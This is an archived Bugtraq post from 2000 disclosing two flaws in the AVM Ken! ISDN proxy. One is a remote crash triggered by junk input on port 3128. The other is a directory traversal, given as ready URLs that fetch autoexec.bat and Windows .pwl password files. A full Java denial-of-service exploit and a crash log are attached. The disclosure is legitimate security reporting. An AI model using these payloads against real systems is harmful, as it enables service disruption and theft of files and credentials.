Bugtraq mailing list archives
(no subject)
From: eax () MAD SCIENTIST COM (eAX [Teelicht])
Date: Sat, 15 Apr 2000 09:26:53 -0400
Hi Bugtraq people,

This is a copy of the mail I sent to AVM about the Security Bugs in Ken! ISDN Proxy Software.

eAX

---------------------------------------------------------------

Dear AVM Team,

I found two serious (security) bugs in your internet/isdn proxy software AVM Ken!, and I think I should inform you first about it.

While testing some things on a friend's system, which is running Ken!, I noticed that I can crash Ken! remotely and force it to cut off all connections, using a simple Telnet connection. I also found a way to download ANY file from the Ken! Server. When I say ANY file I mean ANY file!

The Denial of Service attack (crash):

I scanned the system for open ports and noticed that port 3128 was opened by Ken!. I connected to it via a telnet client and sent some trash (until now just interested in the HTTP error message), but then I noticed that Ken! crashes with a pagefault, closes all connections and restarts. I retested this with a Windows 98 and a Windows 2000 machine, both Ken!'s crashed. (Tested with Ken! 1.03.10 (german))

The download everything bug (dangerous!!):

While looking for more bugs, I found out this: type in your webbrowser:

http://targethost:3128/../../../../../autoexec.bat

or

http://localhost:3128/../../../../../windows/any_pwl_you_want.pwl

If Ken! is located in C:/Programme/Ken!/ or C:/Program Files/Ken!, this will cause Ken! to send you the autoexec.bat, or any file you want (just change the url). I already cracked a test server to check how dangerous this security hole is, and I found out that it is extremely dangerous for servers with important files or remote access (Windows 2000 telnetd), because the person who set it up for me installed Ken! in the default directory. Imagine what would happen if someone would steal an important database from a server running Ken!

The best thing to prevent misuse is to install Ken! into a different directory until the bug is fixed (If Ken! isn't located in one of these directories, you can find the directory by testing the path until you find autoexec.bat, but this is hard.). Retested on a LAN and the Internet, with a Windows 98 and a Windows 2000 Server. (Tested with Ken! 1.03.10 (german))

Your eAX (17 years old)

P.S. Attached to this message is an EXPLOIT CODE written in Java, which can be used on any OS. I also attached a part of the log file from Ken!.
P.SS. Maybe, I will post this to a security mailing list and rootshell in a few days. I say a few days, cause I think you should have time to fix the bugs, if you haven't done this already.
P.SSS. Better luck next time :)
P.SSSS. Fritz Card is really cool!

----Exploit Code------

import java.net.Socket;
import java.io.*;

/*
   BARBIE - The AVM KEN! exploit

   This exploit causes a crash in the AVM KEN! ISDN Proxy software.
   All connections will be cut off, but the server will restart again,
   a few seconds later.

   Tested with AVM KEN! Version 1.03.10 (german)
*/

class barbie {

    String adress;

    // Connect to the proxy port (3128) and send a single junk line.
    public void killken() {
        PrintWriter out = null;
        try {
            Socket connection = new Socket(adress, 3128);
            System.out.println("");
            System.out.println("killing...");
            out = new PrintWriter(connection.getOutputStream(), true);
            out.println("Whooopppss_Ken_died");
            connection.close();
        } catch (IOException e) {
            System.out.println("");
            System.out.println(" Can't meet Ken! ");
        }
    }

    public static void main(String arguments[]) {
        barbie kk = new barbie();
        if (arguments.length < 1) {
            System.out.println("");
            System.out.println("usage: java barbie <adress/ip>");
            System.exit(1);
        }
        kk.adress = arguments[0];
        kk.killken();
    }
}

----------------------

------Log file--------

2000-04-12 20:36:40 keninet: CheckLimits charge(0,50000) time(0,180000) -->0 ACTIVE=TRUE): t1=0 t2=955564600
2000-04-12 20:40:14 kenserv: Process #6c is DOWN, Code=-1073741819
2000-04-12 20:40:14 kenserv: Process KENPROXY.EXE TERMINATED witout UNREGISTER_MSG (CRASH), Restarting immed
2000-04-12 20:40:14 kenserv: ----- Task PROXY(4) STOPPED, restart:1 immed.-----
2000-04-12 20:40:14 kenserv: DUMP: bShutdown=0
2000-04-12 20:40:14 kenserv: TASK CAPI state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK INET state=2 hProc=0x78 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK PROXY state=0 hProc=0x0 tRest=1 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK MAIL state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK DHCP state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK DNS state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK SOCKS state=2 hProc=0x5c tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK MAP state=2 hProc=0x74 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: Executing (KENPROXY.EXE) - OK

----------------------
Current thread:
- (no subject) eAX [Teelicht] (Apr 15)
- Re: KEN! security hole (was: -no subject-) Thorsten Claus (Apr 17)
- bugs in Panda Security 3.0 |Zan (Apr 17)